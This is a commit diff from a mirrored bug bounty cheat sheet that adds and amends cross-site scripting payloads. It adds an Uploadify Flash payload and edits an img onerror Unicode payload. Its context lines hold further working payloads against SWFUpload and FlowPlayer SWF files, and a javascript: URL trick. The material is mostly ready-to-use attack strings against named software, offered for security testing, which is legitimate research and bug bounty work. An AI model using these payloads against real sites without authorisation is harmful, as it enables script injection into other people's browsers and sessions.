mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2025-02-16 14:38:22 +00:00
[XSS] amend Unicode payload, add Flash SWF
This commit is contained in:
parent
469dda90e9
commit
39f4ab3437
1 changed files with 4 additions and 2 deletions
|
@ -147,9 +147,11 @@ javas	cript://www.google.com/%0Aalert(1)
|
|||
|
||||
- SWFUpload 2.2.0.1: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//`
|
||||
|
||||
- Uploadify (legacy): `uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf`
|
||||
|
||||
- FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf`
|
||||
|
||||
_Note: Useful reference on constructing Flash-based XSS payloads from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
|
||||
_Note: Useful reference on constructing Flash-based XSS payloads available at [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
|
||||
|
||||
**Lightweight Markup Languages**
|
||||
|
||||
|
@ -176,7 +178,7 @@ __ javascript:alert(document.domain)
|
|||
**Unicode characters**
|
||||
|
||||
```html
|
||||
†‡•<img src=a onerror=javascript:alert('hacked')>…‰€
|
||||
†‡•<img src=a onerror=javascript:alert('test')>…‰€
|
||||
```
|
||||
|
||||
**AngularJS Template Injection based XSS**
|
||||
|
|
Loading…
Add table
Reference in a new issue